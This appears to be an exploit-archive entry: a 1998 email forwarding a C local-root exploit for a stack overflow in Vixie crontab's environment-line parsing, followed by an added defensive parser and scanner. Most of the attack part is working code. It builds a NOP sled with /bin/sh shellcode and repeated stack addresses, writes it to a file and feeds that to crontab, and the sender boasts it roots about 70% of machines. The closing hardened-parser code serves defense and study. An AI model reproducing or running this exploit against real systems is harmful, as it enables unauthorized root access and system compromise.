Overflow in Vixie crontab

Description: standard overflow
Author: Dave G. wrote the exploit
Compromise: root (local)
Vulnerable Systems: Some RedHat distributions, the German distribution DLD 5.2, etc. Anyone running a vulnerable version of Vixie crontab.
Date: 10 May 1998 (actually it is an older problem)
Date: Sun, 10 May 1998 22:40:57 PDT
From: <[cut]@hotmail.com>
To: fyodor@nmap.org
Subject: Linux Oldie but Goodie
hi fyodor,
here's another one for Linux systems using mr. paul vixie's crontab ...
works not only on some redhats, but also on DLD 5.2 (a german linux
distribution) and many others using the vixie crontab - usually gets you
root on about 70 machines out of 100 ;)
cya,
[cut]
--------------snip--------------
/* vixie crontab buffer overflow for RedHat Linux
 *
 * I dont think too many people know that redhat uses vixie crontab.
 * I didn't find this, just exploited it.
 *
 * Dave G.
 * <daveg@escape.com>
 * http://www.escape.com/~daveg
 */
#include <stdio.h>
#include <string.h>      /* memset, strlen: missing from the original */
#include <sys/types.h>
#include <stdlib.h>
#include <fcntl.h>
#include <unistd.h>

#define DEFAULT_OFFSET -1240
#define BUFFER_SIZE 100  /* MAX_TEMPSTR is 100 */
#define HAPPY_FILE "./Window"

/* i386 only: copies %esp into %eax, the integer return register */
long get_esp(void)
{
    __asm__("movl %esp,%eax\n");
}

int main(int argc, char **argv)
{
    int fd;
    char *buff = NULL;
    unsigned long *addr_ptr = NULL;
    char *ptr = NULL;
    u_char execshell[] =
        "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
        "\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
        "\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";
    /*
     * The sscanf line reads for 'name' as %[^ =]. Neither a space, nor
     * a '=' character appears below
     */
    int i;
    int ofs = DEFAULT_OFFSET;

    /* if we have a argument, use it as offset, else use default */
    if (argc == 2)
        ofs = atoi(argv[1]);
    else if (argc > 2) {
        fprintf(stderr, "egg [offset]\n");
        exit(-1);
    }

    /* print the offset in use */
    printf("Using offset of esp + %d (%x)\n", ofs, get_esp() + ofs);

    buff = malloc(4096);
    if (!buff) {
        printf("can't allocate memory\n");
        exit(0);
    }
    ptr = buff;

    /* fill start of buffer with nops */
    memset(ptr, 0x90, BUFFER_SIZE - strlen(execshell));
    ptr += BUFFER_SIZE - strlen(execshell);

    /* stick asm code into the buffer */
    for (i = 0; i < strlen(execshell); i++)
        *(ptr++) = execshell[i];

    /* follow it with repeated copies of the guessed stack address */
    addr_ptr = (long *)ptr;
    for (i = 0; i < (878 / 4); i++)
        *(addr_ptr++) = get_esp() + ofs;
    ptr = (char *)addr_ptr;

    /* terminate the 'name' token so the line still parses as NAME=value */
    *ptr++ = '=';
    *ptr++ = 'X';
    *ptr++ = '\n';
    *ptr = 0;

    printf("Writing to %s\n", HAPPY_FILE);
    fd = open(HAPPY_FILE, O_WRONLY | O_CREAT, 0666);
    write(fd, buff, strlen(buff));
    close(fd);

    execl("/usr/bin/crontab", "crontab", HAPPY_FILE, NULL);

    /* Successful completion */
    exit(0);
}
--------------snip--------------
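The defect the exploit abuses is an unbounded sscanf %[^ =] conversion into a MAX_TEMPSTR (100-byte) 'name' buffer. The following is an added illustration, not code from the message above or from Vixie cron: a constructed env-line parser that uses a width-limited conversion so the buffer cannot be overrun, plus a helper that scans crontab text for lines whose leading token would not have fit. Function names, the 4096-byte line limit and the value-handling details are assumptions.

```c
#include <stdio.h>
#include <string.h>
#define MAX_TEMPSTR 100  /* the buffer limit the exploit's comment cites */
/* Hardened "NAME=value" parser (constructed example, not Vixie's source).
 * Returns 0 on success, -1 if the line is not an env line, -2 if the name
 * token overran a MAX_TEMPSTR buffer: the input an unbounded %[^ =] turns
 * into a stack overflow. */
int parse_env_line(const char *line, char *name, size_t name_sz,
                   char *value, size_t value_sz)
{
    char tmp[MAX_TEMPSTR];
    const char *p; size_t n;
    /* width 99 == sizeof tmp - 1, so sscanf can never write past tmp */
    if (sscanf(line, "%99[^ =]", tmp) != 1)
        return -1;
    n = strlen(tmp);
    /* token filled the width and more of it follows: reject, don't truncate */
    if (n == sizeof tmp - 1 && line[n] && line[n] != ' ' && line[n] != '=')
        return -2;
    for (p = line + n; *p == ' '; p++) ;
    if (*p++ != '=')
        return -1;
    while (*p == ' ') p++;
    snprintf(name, name_sz, "%s", tmp);
    snprintf(value, value_sz, "%s", p);
    n = strlen(value);
    if (n && value[n - 1] == '\n')          /* drop trailing newline */
        value[n - 1] = '\0';
    return 0;
}
/* Count lines in crontab text whose leading token would overflow a
 * MAX_TEMPSTR buffer, i.e. lines shaped like the one the exploit writes. */
int count_overlong_env_names(const char *text)
{
    int hits = 0;
    const char *p = text;
    while (*p) {
        const char *nl = strchr(p, '\n');
        size_t full = nl ? (size_t)(nl - p) : strlen(p);
        size_t len = full < 4095 ? full : 4095;   /* assumed line cap */
        char line[4096], nm[MAX_TEMPSTR], val[256];
        memcpy(line, p, len);
        line[len] = '\0';
        if (parse_env_line(line, nm, sizeof nm, val, sizeof val) == -2)
            hits++;
        p += full + (nl ? 1 : 0);
    }
    return hits;
}
```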